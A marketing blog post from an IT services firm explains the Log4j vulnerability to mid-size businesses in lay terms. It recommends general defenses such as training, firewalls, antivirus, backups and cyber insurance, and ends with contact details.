Just in Time For The Holidays – LOG4J

What Mid-Size Businesses Need to Know About the Internet’s Latest Cyber Security Threat

If you’re an owner or manager of a mid-sized business, you’ve no doubt heard about the latest threat to your cyber assets – LOG4J. The holidays are an exceptionally vulnerable time for cyber threats as users are focused on closing out their business year, taking end of year vacations, and finishing that last bit of shopping. The heightened stress and reduced time can lead to careless mistakes. Cyber criminals will no doubt attempt to profit from the LOG4J exploit to close out their year-end on a high note.

We at Stryker Networks are committed to helping you protect your business and your digital assets. While not a definitive case study, we will attempt to give you high level answers to three common questions: What is LOG4J? How does it affect me? What do I need to do?

What is LOG4J? – and What It Isn’t

LOG4J is a software library. Think of a library as programs that are used by other programs. You don’t install/buy “Times New Roman Fonts” on your computer, but Word, Excel, and countless other programs include the font “library” as part of their installation. LOG4J is a logging library that is used by Java applications and is commonly found on public facing Apache web servers. Most mid-sized businesses would not host Apache web servers, but they would commonly use web sites that use Java.

The LOG4J vulnerability is NOT a virus; it is an exploit. Think of a virus as someone running through your office burning all your files, while an exploit is the little trick of wiggling the locked door handle just the right way to get into the office. While unauthorized access to the office is concerning, it is not damaging unless used to do something malicious. Once a bad actor gains access to a server using the exploit, they can use the server to host and distribute malware and viruses.

How Does It Affect Me?

The LOG4J exploit affects mid-sized businesses differently than enterprise companies. Large enterprises such as Amazon, Microsoft, and Apple are most likely running applications that are/were susceptible to an attack. They are busy patching their servers to prevent intrusion – just like changing the lock on the door with one that can’t be jiggled open.

Mid-sized businesses face a different problem. You don’t know which websites you use have the vulnerability or their patch status. You are at risk of receiving a virus or malware from a site which you have come to trust. You are most affected because there is yet another method for the bad guys to compromise your network.

What Can you Do About it?

The best defense against this and other cyber threats is to have a comprehensive cyber security plan. Threat actors will use the exploit to access your vendor’s servers and then use those servers to attempt to send and/or run malicious code on your network. You should already have a multi-tiered plan in place to detect, isolate, and remediate these attempts. A typical plan would include:

    • Training: End-User training to keep users alert to unusual activity and email links.
    • Firewall: A properly configured firewall to help prevent a virus from coming into your network and to minimize its ability to activate
    • Anti-Virus: A commercial grade anti-virus application, with updated definitions, to identify and isolate malicious software.
    • Anti-Malware: While not the same as anti-virus software, anti-malware programs identify code that appears suspicious as well as potentially malicious activity. You may also wish to deploy “Zero-Trust” software which only allows authorized software to run on your network.
    • Rights Management: Users rarely need access rights to all programs and software programs rarely need administrative rights to the network. By properly configuring access rights to only permit the privileges needed, any potential damages will be minimized.
    • Data Backups: We recommend on-site and off-site backups of data at both the server and file level. Make sure that your backups are being executed and checked at least daily.
    • Cyber Insurance: Most business and E&O policies exclude risks associated with a cyber attack such as ransoms and data recovery. Check with your insurance agent to ensure that you are properly protected in the unfortunate event that you experience an attack.

Don’t have a plan or not sure if your plan is sufficient? Contact Stryker Networks  at 847-908-3210 or inquiries@strykernetworks.com and we’ll be happy to discuss your concerns and needs.